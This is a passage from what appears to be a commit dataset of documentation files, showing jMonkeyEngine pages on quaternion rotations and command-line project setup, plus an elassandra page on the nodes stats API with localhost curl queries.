object\nfloat angle = 3.14f;\ns.getLocalRotation().fromAngleAxis(angle, axis);\n\n----\n\n\n=== Three Angles\n\nYou can also represent a rotation by defining three angles. The angles represent the rotation about the individual axes. Passing in a three-element array of floats defines the angles where the first element is X, second Y and third is Z. The method provided by Quaternion is `fromAngles` and can also fill an array using `toAngles`\n\n\n==== Example - Rotate a Spatial Using fromAngles\n\n[source,java]\n----\n\n\/\/rotate 1 radian on the x, 3 on the y and 0 on z\nfloat[] angles = {1, 3, 0};\ns.getLocalRotation().fromAngles(angles);\n\n----\n\n\n=== Three Axes\n\nIf you have three axes that define your rotation, where the axes define the left axis, up axis and directional axis respectively) you can make use of `fromAxes` to generate the Quaternion. It should be noted that this will generate a new <<jme3\/matrix#,Matrix>> object that is then garbage collected, thus, this method should not be used if it will be called many times. Again, `toAxes` will populate a <<jme3\/terminology#vectors,Vector3f>> array.\n\n\n==== Example - Rotate a Spatial Using fromAxes\n\n[source,java]\n----\n\n\/\/rotate a spatial to face up ~45 degrees\nVector3f[] axes = new Vector3f[3];\naxes[0] = new Vector3f(-1, 0, 0); \/\/left\naxes[1] = new Vector3f(0, 0.5f, 0.5f); \/\/up\naxes[2] = new Vector3f(0, 0.5f, 0.5f); \/\/dir\n\ns.getLocalRotation().fromAxes(axes);\n\n----\n\n\n=== Rotation Matrix\n\nCommonly you might find yourself with a Matrix defining a rotation. In fact, it's very common to contain a rotation in a Matrix, create a Quaternion, rotate the Quaternion, and then get the Matrix back. Quaternion contains a `fromRotationMatrix` method that will create the appropriate Quaternion based on the given Matrix. The `toRotationMatrix` will populate a given Matrix.\n\n\n==== Example - Rotate a Spatial Using a Rotation Matrix\n\n[source,java]\n----\n\n\nMatrix3f mat = new Matrix3f();\nmat.setColumn(0, new Vector3f(1,0,0));\nmat.setColumn(1, new Vector3f(0,-1,0));\nmat.setColumn(2, new Vector3f(0,0,1));\n\ns.getLocalRotation().fromRotationMatrix(mat);\n\n----\n\nAs you can see there are many ways to build a Quaternion. This allows you to work with rotations in a way that is conceptually easier to picture, but still build Quaternions for internal representation.\n\n\n=== Slerp\n\nOne of the biggest advantages to using Quaternions is allowing interpolation between two rotations. That is, if you have an initial Quaternion representing the original orientation of an object, and you have a final Quaternion representing the orientation you want the object to face, you can do this very smoothly with slerp. Simply supply the time, where time is [0, 1] and 0 is the initial rotation and 1 is the final rotation.\n\n\n==== Example - Use Slerp to Rotate Between two Quaternions\n\n[source,java]\n----\n\nQuaternion q1;\nQuaternion q2;\n\n\/\/the rotation half-way between these two\nQuaternion q3 = q1.slerp(q2, 0.5f);\n\n----\n","old_contents":"= quaternion\n:author:\n:revnumber:\n:revdate: 2016\/03\/17 20:48\n:relfileprefix: ..\/\n:imagesdir: ..\nifdef::env-github,env-browser[:outfilesuffix: .adoc]\n\n\n\n== Quaternion\n\nSee link:https:\/\/javadoc.jmonkeyengine.org\/index.html?com\/jme3\/math\/Quaternion.html[Javadoc]\n\n\n=== Definition\n\nQuaternions define a subset of a hypercomplex number system. Quaternions are defined by (i^2^ = j^2^ = k^2^ = ijk = -1). jME makes use of Quaternions because they allow for compact representations of rotations, or correspondingly, orientations, in 3D space. With only four float values, we can represent an object's orientation, where a rotation matrix would require nine. They also require fewer arithmetic operations for concatenation.\n\nAdditional benefits of the Quaternion is reducing the chance of link:http:\/\/en.wikipedia.org\/wiki\/Gimbal_lock[Gimbal Lock] and allowing for easily interpolation between two rotations (spherical linear interpolation or slerp).\n\nWhile Quaternions are quite difficult to fully understand, there are an exceeding number of convenience methods to allow you to use them without having to understand the math behind it. Basically, these methods involve nothing more than setting the Quaternion's x,y,z,w values using other means of representing rotations. The Quaternion is then contained in <<jme3\/advanced\/spatial#,Spatial>> as its local rotation component.\n\nQuaternion *q* has the form\n\n*q* = <_w,x,y,z_> = _w + xi + yj + zk_\n\nor alternatively, it can be written as:\n\n*q* = *s* + *v*, where *s* represents the scalar part corresponding to the w-component of *q*, and *v* represents the vector part of the (x, y, z) components of *q*.\n\nMultiplication of Quaternions uses the distributive law and adheres to the following rules with multiplying the imaginary components (i, j, k):\n\n`i^2^ = j^2^ = k^2^ = -1`+\n`ij = -ji = k`+\n`jk = -kj = i`+\n`ki = -ik = j`\n\nHowever, Quaternion multiplication is _not_ commutative, so we have to pay attention to order.\n\n*q~1~q~2~* = s~1~s~2~ - *v~1~* dot *v~2~* + s~1~*v~2~* + s~2~*v~1~* + *v~1~* X *v~2~*\n\nQuaternions also have conjugates where the conjugate of *q* is (s - *v*)\n\nThese basic operations allow us to convert various rotation representations to Quaternions.\n\n\n=== Angle Axis\n\nYou might wish to represent your rotations as Angle Axis pairs. That is, you define a axis of rotation and the angle with which to rotate about this axis. Quaternion defines a method `fromAngleAxis` (and `fromAngleNormalAxis`) to create a Quaternion from this pair. This is acutally used quite a bit in jME demos to continually rotate objects. You can also obtain a Angle Axis rotation from an existing Quaternion using `toAngleAxis`.\n\n\n==== Example - Rotate a Spatial Using fromAngleAxis\n\n[source,java]\n----\n\n\/\/rotate about the Y-Axis by approximately 1 pi\nVector3f axis = Vector3f.UNIT_Y; \/\/ this equals (0, 1, 0) and does not require to create a new object\nfloat angle = 3.14f;\ns.getLocalRotation().fromAngleAxis(angle, axis);\n\n----\n\n\n=== Three Angles\n\nYou can also represent a rotation by defining three angles. The angles represent the rotation about the individual axes. Passing in a three-element array of floats defines the angles where the first element is X, second Y and third is Z. The method provided by Quaternion is `fromAngles` and can also fill an array using `toAngles`\n\n\n==== Example - Rotate a Spatial Using fromAngles\n\n[source,java]\n----\n\n\/\/rotate 1 radian on the x, 3 on the y and 0 on z\nfloat[] angles = {1, 3, 0};\ns.getLocalRotation().fromAngles(angles);\n\n----\n\n\n=== Three Axes\n\nIf you have three axes that define your rotation, where the axes define the left axis, up axis and directional axis respectively) you can make use of `fromAxes` to generate the Quaternion. It should be noted that this will generate a new <<jme3\/matrix#,Matrix>> object that is then garbage collected, thus, this method should not be used if it will be called many times. Again, `toAxes` will populate a <<jme3\/terminology#vectors,Vector3f>> array.\n\n\n==== Example - Rotate a Spatial Using fromAxes\n\n[source,java]\n----\n\n\/\/rotate a spatial to face up ~45 degrees\nVector3f[] axes = new Vector3f[3];\naxes[0] = new Vector3f(-1, 0, 0); \/\/left\naxes[1] = new Vector3f(0, 0.5f, 0.5f); \/\/up\naxes[2] = new Vector3f(0, 0.5f, 0.5f); \/\/dir\n\ns.getLocalRotation().fromAxes(axes);\n\n----\n\n\n=== Rotation Matrix\n\nCommonly you might find yourself with a Matrix defining a rotation. In fact, it's very common to contain a rotation in a Matrix, create a Quaternion, rotate the Quaternion, and then get the Matrix back. Quaternion contains a `fromRotationMatrix` method that will create the appropriate Quaternion based on the given Matrix. The `toRotationMatrix` will populate a given Matrix.\n\n\n==== Example - Rotate a Spatial Using a Rotation Matrix\n\n[source,java]\n----\n\n\nMatrix3f mat = new Matrix3f();\nmat.setColumn(0, new Vector3f(1,0,0));\nmat.setColumn(1, new Vector3f(0,-1,0));\nmat.setColumn(2, new Vector3f(0,0,1));\n\ns.getLocalRotation().fromRotationMatrix(mat);\n\n----\n\nAs you can see there are many ways to build a Quaternion. This allows you to work with rotations in a way that is conceptually easier to picture, but still build Quaternions for internal representation.\n\n\n=== Slerp\n\nOne of the biggest advantages to using Quaternions is allowing interpolation between two rotations. That is, if you have an initial Quaternion representing the original orientation of an object, and you have a final Quaternion representing the orientation you want the object to face, you can do this very smoothly with slerp. Simply supply the time, where time is [0, 1] and 0 is the initial rotation and 1 is the final rotation.\n\n\n==== Example - Use Slerp to Rotate Between two Quaternions\n\n[source,java]\n----\n\nQuaternion q1;\nQuaternion q2;\n\n\/\/the rotation half-way between these two\nQuaternion q3 = q1.slerp(q2, 0.5f);\n\n----\n","returncode":0,"stderr":"","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"f75e74f3c8169543ad4bb431408cd896852fc1ee","subject":"Updated admonition.","message":"Updated admonition.\n","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"src\/docs\/asciidoc\/jme3\/simpleapplication_from_the_commandline.adoc","new_file":"src\/docs\/asciidoc\/jme3\/simpleapplication_from_the_commandline.adoc","new_contents":"= Starting a JME3 application from the Commandline\n:author:\n:revnumber:\n:revdate: 2016\/03\/17 20:48\n:keywords: documentation, install\n:relfileprefix: ..\/\n:imagesdir: ..\n:experimental:\nifdef::env-github,env-browser[:outfilesuffix: .adoc]\n\n\nAlthough we recommend the jMonkeyEngine <<sdk#,SDK>> for developing JME3 games, you can use any IDE (integrated development environment) such as <<jme3\/setting_up_netbeans_and_jme3#,NetBeans>> or <<jme3\/setting_up_jme3_in_eclipse#,Eclipse>>, and even work freely from the commandline. Here is a generic IDE-independent \"`getting started`\" tutorial.\n\nThis example shows how to set up and run a simple application (HelloJME3) that depends on the jMonkeyEngine3 libraries.\n\nThe directory structure will look as follows:\n\n[source]\n----\n\njme3\/\njme3\/lib\njme3\/src\n...\nHelloJME3\/\nHelloJME3\/lib\nHelloJME3\/assets\nHelloJME3\/src\n...\n----\n\n\n== Installing the JME3 Framework\n\nTo install the development version of jme3, download the latest link:https:\/\/github.com\/jMonkeyEngine\/jmonkeyengine\/releases[stable release], unzip the folder into a directory named `jme3`. The filenames here are just an example, but they will always be something like `jME3.x-stable`.\n\n[source]\n----\n\nmkdir jme3\ncd jme3\nunzip jME3.1-stable.zip\n\n----\n\nAlternatively, you can build JME3 from the sources. (Recommended for JME3 developers.)\n\n[source]\n----\nsvn checkout https:\/\/jmonkeyengine.googlecode.com\/svn\/branches\/3.0final\/engine jme3\ncd jme3\nant run\ncd ..\n----\n\nIf you see a Test Chooser application open now, the build was successful.\n\nTIP: Use just ant instead of ant run to build the libraries without running the demos.\n\n== Sample Project Directory Structure\n\nFirst we set up the directory and source package structure for your game project. Note that the game project directory `HelloJME3` is on the same level as your `jme3` checkout. In this example, we create a Java package that we call `hello` in the source directory.\n\n[source]\n----\n\nmkdir HelloJME3\nmkdir HelloJME3\/src\nmkdir HelloJME3\/src\/hello\n\n----\n\n\n== Libraries\n\nNext you copy the necessary JAR libraries from the download to your project. You only have to do this set of steps once every time you download a new JME3 build. For a detailed description of the separate jar files see <<jme3\/jme3_source_structure#structure_of_jmonkeyengine3_jars,this list>>.\n\n[source]\n----\n\nmkdir HelloJME3\/build\nmkdir HelloJME3\/lib\ncp jme3\/lib\/*.* HelloJME3\/lib\n\n----\n\nIf you have built JME3 from the sources, then the copy paths are different:\n\n[source]\n----\n\nmkdir HelloJME3\/build\nmkdir HelloJME3\/lib\ncp jme3\/dist\/*.* HelloJME3\/lib\n\n----\n\n\n=== Sample Code\n\nTo test your setup, create the file `HelloJME3\/src\/hello\/HelloJME3.java` with any text editor, paste the following sample code, and save.\n\n[source,java]\n----\n\npackage hello;\n\nimport com.jme3.app.SimpleApplication;\nimport com.jme3.material.Material;\nimport com.jme3.math.Vector3f;\nimport com.jme3.scene.Geometry;\nimport com.jme3.scene.shape.Box;\nimport com.jme3.math.ColorRGBA;\n\npublic class HelloJME3 extends SimpleApplication {\n\n public static void main(String[] args){\n HelloJME3 app = new HelloJME3();\n app.start();\n }\n\n @Override\n public void simpleInitApp() {\n Box b = new Box(Vector3f.ZERO, 1, 1, 1);\n Geometry geom = new Geometry(\"Box\", b);\n Material mat = new Material(assetManager,\n \"Common\/MatDefs\/Misc\/Unshaded.j3md\");\n mat.setColor(\"Color\", ColorRGBA.Blue);\n geom.setMaterial(mat);\n rootNode.attachChild(geom);\n }\n}\n----\n\n\n== Build and Run\n\nWe build the sample application into the build directory\u2026\n\n[source]\n----\n\ncd HelloJME3\njavac -d build -cp \"lib\/eventbus-1.4.jar:lib\/j-ogg-oggd.jar:lib\/j-ogg-vorbisd.jar:lib\/jME3-lwjgl-natives.jar:lib\/jbullet.jar:lib\/jinput.jar:lib\/lwjgl.jar:lib\/stack-alloc.jar:lib\/vecmath.jar:lib\/xmlpull-xpp3-1.1.4c.jar:lib\/jME3-blender.jar:lib\/jME3-core.jar:lib\/jME3-desktop.jar:lib\/jME3-jogg.jar:lib\/jME3-plugins.jar:lib\/jME3-terrain.jar:lib\/jME3-testdata.jar:lib\/jME3-niftygui.jar:lib\/nifty-default-controls.jar:lib\/nifty-examples.jar:lib\/nifty-style-black.jar:lib\/nifty.jar:.\" src\/hello\/HelloJME3.java\n\n----\n\n\u2026 and run it.\n\n[source]\n----\n\ncd build\njava -cp \"..\/lib\/eventbus-1.4.jar:..\/lib\/j-ogg-oggd.jar:..\/lib\/j-ogg-vorbisd.jar:..\/lib\/jME3-lwjgl-natives.jar:..\/lib\/jbullet.jar:..\/lib\/jinput.jar:..\/lib\/lwjgl.jar:..\/lib\/stack-alloc.jar:..\/lib\/vecmath.jar:..\/lib\/xmlpull-xpp3-1.1.4c.jar:..\/lib\/jME3-blender.jar:..\/lib\/jME3-core.jar:..\/lib\/jME3-desktop.jar:..\/lib\/jME3-jogg.jar:..\/lib\/jME3-plugins.jar:..\/lib\/jME3-terrain.jar:..\/lib\/jME3-testdata.jar:..\/lib\/jME3-niftygui.jar:..\/lib\/nifty-default-controls.jar:..\/lib\/nifty-examples.jar:..\/lib\/nifty-style-black.jar:..\/lib\/nifty.jar:.\" hello\/HelloJME3\n----\n\nNOTE: If you use Windows, the classpath separator is kbd:[\\ ] instead of kbd:[\/].\n\nIf a settings dialog pops up, confirm the default settings. You should now see a simple window with a 3-D cube. Use the mouse and the WASD keys to move. It works!\n\n\n== Recommended Asset Directory Structure\n\nFor <<jme3\/intermediate\/multi-media_asset_pipeline#,multi-media files, models, and other assets>>, we recommend creating the following project structure:\n\n[source]\n----\n\ncd HelloJME3\nmkdir assets\nmkdir assets\/Interface\nmkdir assets\/Materials\nmkdir assets\/MatDefs\nmkdir assets\/Models\nmkdir assets\/Scenes\nmkdir assets\/Shaders\nmkdir assets\/Sounds\nmkdir assets\/Textures\n\n----\n\nThis directory structure will allow <<jme3\/intermediate\/simpleapplication#,SimpleApplication>>'s default <<jme3\/advanced\/asset_manager#,AssetManager>> to load media files from your `assets` directory, like in this example:\n\n[source]\n----\n\nimport com.jme3.scene.Spatial;\n...\n Spatial elephant = assetManager.loadModel(\"Models\/Elephant\/Elephant.meshxml\");\n rootNode.attachChild(elephant);\n...\n\n----\n\nYou will learn more about the asset manager and how to customize it later. For now feel free to structure your assets (images, textures, models) into further sub-directories, like in this example the `assets\/models\/Elephant` directory that contains the `elephant.mesh.xml` model and its materials.\n\n\n== Next Steps\n\nNow follow the <<jme3#,tutorials>> and write your first jMonkeyEngine game.\n","old_contents":"= Starting a JME3 application from the Commandline\n:author:\n:revnumber:\n:revdate: 2016\/03\/17 20:48\n:keywords: documentation, install\n:relfileprefix: ..\/\n:imagesdir: ..\n:experimental: \nifdef::env-github,env-browser[:outfilesuffix: .adoc]\n\n\nAlthough we recommend the jMonkeyEngine <<sdk#,SDK>> for developing JME3 games, you can use any IDE (integrated development environment) such as <<jme3\/setting_up_netbeans_and_jme3#,NetBeans>> or <<jme3\/setting_up_jme3_in_eclipse#,Eclipse>>, and even work freely from the commandline. Here is a generic IDE-independent \"`getting started`\" tutorial.\n\nThis example shows how to set up and run a simple application (HelloJME3) that depends on the jMonkeyEngine3 libraries.\n\nThe directory structure will look as follows:\n\n[source]\n----\n\njme3\/\njme3\/lib\njme3\/src\n...\nHelloJME3\/\nHelloJME3\/lib\nHelloJME3\/assets\nHelloJME3\/src\n...\n----\n\n\n== Installing the JME3 Framework\n\nTo install the development version of jme3, download the latest link:https:\/\/github.com\/jMonkeyEngine\/jmonkeyengine\/releases[stable release], unzip the folder into a directory named `jme3`. The filenames here are just an example, but they will always be something like `jME3.x-stable`.\n\n[source]\n----\n\nmkdir jme3\ncd jme3\nunzip jME3.1-stable.zip\n\n----\n\nAlternatively, you can build JME3 from the sources. (Recommended for JME3 developers.)\n\n[source]\n----\nsvn checkout https:\/\/jmonkeyengine.googlecode.com\/svn\/branches\/3.0final\/engine jme3\ncd jme3\nant run\ncd ..\n----\n\nIf you see a Test Chooser application open now, the build was successful.\n\nTIP: Use just ant instead of ant run to build the libraries without running the demos.\n\n== Sample Project Directory Structure\n\nFirst we set up the directory and source package structure for your game project. Note that the game project directory `HelloJME3` is on the same level as your `jme3` checkout. In this example, we create a Java package that we call `hello` in the source directory.\n\n[source]\n----\n\nmkdir HelloJME3\nmkdir HelloJME3\/src\nmkdir HelloJME3\/src\/hello\n\n----\n\n\n== Libraries\n\nNext you copy the necessary JAR libraries from the download to your project. You only have to do this set of steps once every time you download a new JME3 build. For a detailed description of the separate jar files see <<jme3\/jme3_source_structure#structure_of_jmonkeyengine3_jars,this list>>.\n\n[source]\n----\n\nmkdir HelloJME3\/build\nmkdir HelloJME3\/lib\ncp jme3\/lib\/*.* HelloJME3\/lib\n\n----\n\nIf you have built JME3 from the sources, then the copy paths are different:\n\n[source]\n----\n\nmkdir HelloJME3\/build\nmkdir HelloJME3\/lib\ncp jme3\/dist\/*.* HelloJME3\/lib\n\n----\n\n\n=== Sample Code\n\nTo test your setup, create the file `HelloJME3\/src\/hello\/HelloJME3.java` with any text editor, paste the following sample code, and save.\n\n[source,java]\n----\n\npackage hello;\n\nimport com.jme3.app.SimpleApplication;\nimport com.jme3.material.Material;\nimport com.jme3.math.Vector3f;\nimport com.jme3.scene.Geometry;\nimport com.jme3.scene.shape.Box;\nimport com.jme3.math.ColorRGBA;\n\npublic class HelloJME3 extends SimpleApplication {\n\n public static void main(String[] args){\n HelloJME3 app = new HelloJME3();\n app.start();\n }\n\n @Override\n public void simpleInitApp() {\n Box b = new Box(Vector3f.ZERO, 1, 1, 1);\n Geometry geom = new Geometry(\"Box\", b);\n Material mat = new Material(assetManager,\n \"Common\/MatDefs\/Misc\/Unshaded.j3md\");\n mat.setColor(\"Color\", ColorRGBA.Blue);\n geom.setMaterial(mat);\n rootNode.attachChild(geom);\n }\n}\n----\n\n\n== Build and Run\n\nWe build the sample application into the build directory\u2026\n\n[source]\n----\n\ncd HelloJME3\njavac -d build -cp \"lib\/eventbus-1.4.jar:lib\/j-ogg-oggd.jar:lib\/j-ogg-vorbisd.jar:lib\/jME3-lwjgl-natives.jar:lib\/jbullet.jar:lib\/jinput.jar:lib\/lwjgl.jar:lib\/stack-alloc.jar:lib\/vecmath.jar:lib\/xmlpull-xpp3-1.1.4c.jar:lib\/jME3-blender.jar:lib\/jME3-core.jar:lib\/jME3-desktop.jar:lib\/jME3-jogg.jar:lib\/jME3-plugins.jar:lib\/jME3-terrain.jar:lib\/jME3-testdata.jar:lib\/jME3-niftygui.jar:lib\/nifty-default-controls.jar:lib\/nifty-examples.jar:lib\/nifty-style-black.jar:lib\/nifty.jar:.\" src\/hello\/HelloJME3.java\n\n----\n\n\u2026 and run it.\n\n[source]\n----\n\ncd build\njava -cp \"..\/lib\/eventbus-1.4.jar:..\/lib\/j-ogg-oggd.jar:..\/lib\/j-ogg-vorbisd.jar:..\/lib\/jME3-lwjgl-natives.jar:..\/lib\/jbullet.jar:..\/lib\/jinput.jar:..\/lib\/lwjgl.jar:..\/lib\/stack-alloc.jar:..\/lib\/vecmath.jar:..\/lib\/xmlpull-xpp3-1.1.4c.jar:..\/lib\/jME3-blender.jar:..\/lib\/jME3-core.jar:..\/lib\/jME3-desktop.jar:..\/lib\/jME3-jogg.jar:..\/lib\/jME3-plugins.jar:..\/lib\/jME3-terrain.jar:..\/lib\/jME3-testdata.jar:..\/lib\/jME3-niftygui.jar:..\/lib\/nifty-default-controls.jar:..\/lib\/nifty-examples.jar:..\/lib\/nifty-style-black.jar:..\/lib\/nifty.jar:.\" hello\/HelloJME3\n----\n\nNOTE: If you use Windows, the classpath separator is kbd:[\\ ] instead of kbd:[\/].\n\nIf a settings dialog pops up, confirm the default settings. You should now see a simple window with a 3-D cube. Use the mouse and the WASD keys to move. It works!\n\n\n== Recommended Asset Directory Structure\n\nFor <<jme3\/intermediate\/multi-media_asset_pipeline#,multi-media files, models, and other assets>>, we recommend creating the following project structure:\n\n[source]\n----\n\ncd HelloJME3\nmkdir assets\nmkdir assets\/Interface\nmkdir assets\/Materials\nmkdir assets\/MatDefs\nmkdir assets\/Models\nmkdir assets\/Scenes\nmkdir assets\/Shaders\nmkdir assets\/Sounds\nmkdir assets\/Textures\n\n----\n\nThis directory structure will allow <<jme3\/intermediate\/simpleapplication#,SimpleApplication>>'s default <<jme3\/advanced\/asset_manager#,AssetManager>> to load media files from your `assets` directory, like in this example:\n\n[source]\n----\n\nimport com.jme3.scene.Spatial;\n...\n Spatial elephant = assetManager.loadModel(\"Models\/Elephant\/Elephant.meshxml\");\n rootNode.attachChild(elephant);\n...\n\n----\n\nYou will learn more about the asset manager and how to customize it later. For now feel free to structure your assets (images, textures, models) into further sub-directories, like in this example the `assets\/models\/Elephant` directory that contains the `elephant.mesh.xml` model and its materials.\n\n\n== Next Steps\n\nNow follow the <<jme3#,tutorials>> and write your first jMonkeyEngine game.\n","returncode":0,"stderr":"","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"a025c9c2eb1564033eb148a8d157ae70849b108c","subject":"Clarify requesting all stats in node stats docs","message":"Clarify requesting all stats in node stats docs\n\nThis commit clarifies how to explicitly obtain all stats from the node\nstats API.\n","repos":"strapdata\/elassandra-test,strapdata\/elassandra-test,strapdata\/elassandra-test,strapdata\/elassandra-test,strapdata\/elassandra-test,strapdata\/elassandra-test,strapdata\/elassandra-test","old_file":"docs\/reference\/cluster\/nodes-stats.asciidoc","new_file":"docs\/reference\/cluster\/nodes-stats.asciidoc","new_contents":"[[cluster-nodes-stats]]\n== Nodes Stats\n\n[float]\n=== Nodes statistics\n\nThe cluster nodes stats API allows to retrieve one or more (or all) of\nthe cluster nodes statistics.\n\n[source,js]\n--------------------------------------------------\ncurl -XGET 'http:\/\/localhost:9200\/_nodes\/stats'\ncurl -XGET 'http:\/\/localhost:9200\/_nodes\/nodeId1,nodeId2\/stats'\n--------------------------------------------------\n\nThe first command retrieves stats of all the nodes in the cluster. The\nsecond command selectively retrieves nodes stats of only `nodeId1` and\n`nodeId2`. All the nodes selective options are explained\n<<cluster-nodes,here>>.\n\nBy default, all stats are returned. You can limit this by combining any\nof `indices`, `os`, `process`, `jvm`, `transport`, `http`,\n`fs`, `breaker` and `thread_pool`. For example:\n\n[horizontal]\n`indices`::\n\tIndices stats about size, document count, indexing and\n\tdeletion times, search times, field cache size, merges and flushes\n\n`fs`::\n\tFile system information, data path, free disk space, read\/write\n\tstats (see <<fs-info,FS information>>)\n\n`http`::\n\tHTTP connection information\n\n`jvm`::\n\tJVM stats, memory pool information, garbage collection, buffer\n\tpools, number of loaded\/unloaded classes\n\n`os`::\n\tOperating system stats, load average, mem, swap\n\t(see <<os-stats,OS statistics>>)\n\n`process`::\n\tProcess statistics, memory consumption, cpu usage, open\n\tfile descriptors (see <<process-stats,Process statistics>>)\n\n`thread_pool`::\n\tStatistics about each thread pool, including current\n\tsize, queue and rejected tasks\n\n`transport`::\n\tTransport statistics about sent and received bytes in\n\tcluster communication\n\n`breaker`::\n\tStatistics about the field data circuit breaker\n\n[source,js]\n--------------------------------------------------\n# return indices and os\ncurl -XGET 'http:\/\/localhost:9200\/_nodes\/stats\/os'\n# return just os and process\ncurl -XGET 'http:\/\/localhost:9200\/_nodes\/stats\/os,process'\n# specific type endpoint\ncurl -XGET 'http:\/\/localhost:9200\/_nodes\/stats\/process'\ncurl -XGET 'http:\/\/localhost:9200\/_nodes\/10.0.0.1\/stats\/process'\n--------------------------------------------------\n\nAll stats can be explicitly requested via `\/_nodes\/stats\/_all` or `\/_nodes\/stats?metric=_all`.\n\n[float]\n[[fs-info]]\n==== FS information\n\nThe `fs` flag can be set to retrieve\ninformation that concern the file system:\n\n`fs.timestamp`::\n\tLast time the file stores statistics have been refreshed\n\n`fs.total.total_in_bytes`::\n\tTotal size (in bytes) of all file stores\n\n`fs.total.free_in_bytes`::\n\tTotal number of unallocated bytes in all file stores\n\n`fs.total.available_in_bytes`::\n\tTotal number of bytes available to this Java virtual machine on all file stores\n\n`fs.data`::\n\tList of all file stores\n\n`fs.data.path`::\n\tPath to the file store\n\n`fs.data.mount`::\n\tMount point of the file store (ex: \/dev\/sda2)\n\n`fs.data.type`::\n\tType of the file store (ex: ext4)\n\n`fs.data.total_in_bytes`::\n\tTotal size (in bytes) of the file store\n\n`fs.data.free_in_bytes`::\n\tTotal number of unallocated bytes in the file store\n\n`fs.data.available_in_bytes`::\n\tTotal number of bytes available to this Java virtual machine on this file store\n\n`fs.data.spins` (Linux only)::\n\tIndicates if the file store is backed by spinning storage.\n\t`null` means we could not determine it, `true` means the device possibly spins\n\t and `false` means it does not (ex: solid-state disks).\n\n[float]\n[[os-stats]]\n==== Operating System statistics\n\nThe `os` flag can be set to retrieve statistics that concern\nthe operating system:\n\n`os.timestamp`::\n\tLast time the operating system statistics have been refreshed\n\n`os.percent`::\n Recent CPU usage for the whole system, or -1 if not supported\n\n`os.load_average`::\n\tSystem load average for the last minute, or -1 if not supported\n\n`os.mem.total_in_bytes`::\n\tTotal amount of physical memory in bytes\n\n`os.mem.free_in_bytes`::\n\tAmount of free physical memory in bytes\n\n`os.mem.free_percent`::\n\tPercentage of free memory\n\n`os.mem.used_in_bytes`::\n\tAmount of used physical memory in bytes\n\n`os.mem.used_percent`::\n\tPercentage of used memory\n\n`os.swap.total_in_bytes`::\n\tTotal amount of swap space in bytes\n\n`os.swap.free_in_bytes`::\n\tAmount of free swap space in bytes\n\n`os.swap.used_in_bytes`::\n\tAmount of used swap space in bytes\n\n\n[float]\n[[process-stats]]\n==== Process statistics\n\nThe `process` flag can be set to retrieve statistics that concern\nthe current running process:\n\n`process.timestamp`::\n\tLast time the process statistics have been refreshed\n\n`process.open_file_descriptors`::\n\tNumber of opened file descriptors associated with the current process, or -1 if not supported\n\n`process.max_file_descriptors`::\n\tMaximum number of file descriptors allowed on the system, or -1 if not supported\n\n`process.cpu.percent`::\n\tCPU usage in percent, or -1 if not known at the time the stats are computed\n\n`process.cpu.total_in_millis`::\n\tCPU time (in milliseconds) used by the process on which the Java virtual machine is running, or -1 if not supported\n\n`process.mem.total_virtual_in_bytes`::\n\tSize in bytes of virtual memory that is guaranteed to be available to the running process\n\n\n[float]\n[[field-data]]\n=== Field data statistics\n\nYou can get information about field data memory usage on node\nlevel or on index level.\n\n[source,js]\n--------------------------------------------------\n# Node Stats\ncurl -XGET 'http:\/\/localhost:9200\/_nodes\/stats\/indices\/?fields=field1,field2&pretty'\n\n# Indices Stat\ncurl -XGET 'http:\/\/localhost:9200\/_stats\/fielddata\/?fields=field1,field2&pretty'\n\n# You can use wildcards for field names\ncurl -XGET 'http:\/\/localhost:9200\/_stats\/fielddata\/?fields=field*&pretty'\ncurl -XGET 'http:\/\/localhost:9200\/_nodes\/stats\/indices\/?fields=field*&pretty'\n--------------------------------------------------\n\n[float]\n[[search-groups]]\n=== Search groups\n\nYou can get statistics about search groups for searches executed\non this node.\n\n[source,js]\n--------------------------------------------------\n# All groups with all stats\ncurl -XGET 'http:\/\/localhost:9200\/_nodes\/stats?pretty&groups=_all'\n\n# Some groups from just the indices stats\ncurl -XGET 'http:\/\/localhost:9200\/_nodes\/stats\/indices?pretty&groups=foo,bar'\n--------------------------------------------------\n","old_contents":"[[cluster-nodes-stats]]\n== Nodes Stats\n\n[float]\n=== Nodes statistics\n\nThe cluster nodes stats API allows to retrieve one or more (or all) of\nthe cluster nodes statistics.\n\n[source,js]\n--------------------------------------------------\ncurl -XGET 'http:\/\/localhost:9200\/_nodes\/stats'\ncurl -XGET 'http:\/\/localhost:9200\/_nodes\/nodeId1,nodeId2\/stats'\n--------------------------------------------------\n\nThe first command retrieves stats of all the nodes in the cluster. The\nsecond command selectively retrieves nodes stats of only `nodeId1` and\n`nodeId2`. All the nodes selective options are explained\n<<cluster-nodes,here>>.\n\nBy default, all stats are returned. You can limit this by combining any\nof `indices`, `os`, `process`, `jvm`, `transport`, `http`,\n`fs`, `breaker` and `thread_pool`. For example:\n\n[horizontal]\n`indices`::\n\tIndices stats about size, document count, indexing and\n\tdeletion times, search times, field cache size, merges and flushes\n\n`fs`::\n\tFile system information, data path, free disk space, read\/write\n\tstats (see <<fs-info,FS information>>)\n\n`http`::\n\tHTTP connection information\n\n`jvm`::\n\tJVM stats, memory pool information, garbage collection, buffer\n\tpools, number of loaded\/unloaded classes\n\n`os`::\n\tOperating system stats, load average, mem, swap\n\t(see <<os-stats,OS statistics>>)\n\n`process`::\n\tProcess statistics, memory consumption, cpu usage, open\n\tfile descriptors (see <<process-stats,Process statistics>>)\n\n`thread_pool`::\n\tStatistics about each thread pool, including current\n\tsize, queue and rejected tasks\n\n`transport`::\n\tTransport statistics about sent and received bytes in\n\tcluster communication\n\n`breaker`::\n\tStatistics about the field data circuit breaker\n\n[source,js]\n--------------------------------------------------\n# return indices and os\ncurl -XGET 'http:\/\/localhost:9200\/_nodes\/stats\/os'\n# return just os and process\ncurl -XGET 'http:\/\/localhost:9200\/_nodes\/stats\/os,process'\n# specific type endpoint\ncurl -XGET 'http:\/\/localhost:9200\/_nodes\/stats\/process'\ncurl -XGET 'http:\/\/localhost:9200\/_nodes\/10.0.0.1\/stats\/process'\n--------------------------------------------------\n\nThe `all` flag can be set to return all the stats.\n\n[float]\n[[fs-info]]\n==== FS information\n\nThe `fs` flag can be set to retrieve\ninformation that concern the file system:\n\n`fs.timestamp`::\n\tLast time the file stores statistics have been refreshed\n\n`fs.total.total_in_bytes`::\n\tTotal size (in bytes) of all file stores\n\n`fs.total.free_in_bytes`::\n\tTotal 